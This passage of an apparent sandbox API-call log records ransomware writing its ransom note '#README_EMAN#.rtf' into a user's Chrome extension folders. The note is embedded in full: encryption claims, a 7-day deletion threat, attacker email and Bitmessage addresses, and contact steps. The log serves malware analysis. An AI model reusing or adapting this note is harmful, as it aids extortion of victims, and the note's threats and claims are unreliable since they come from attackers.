middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0291.157] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x2364cd8, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\n\x06H\x06*\x06'\x06 ", lpUsedDefaultChar=0x0) returned 8717 [0291.157] WriteFile (in: hFile=0x2ec, lpBuffer=0x2364cd8*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x2364cd8*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0291.157] CloseHandle (hObject=0x2ec) returned 1 [0291.157] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\hi\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\hi\\#readme_eman#.rtf")) returned 0xffffffff [0291.158] GetLastError () returned 0x2 [0291.158] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\hi\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\hi\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2ec [0291.158] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 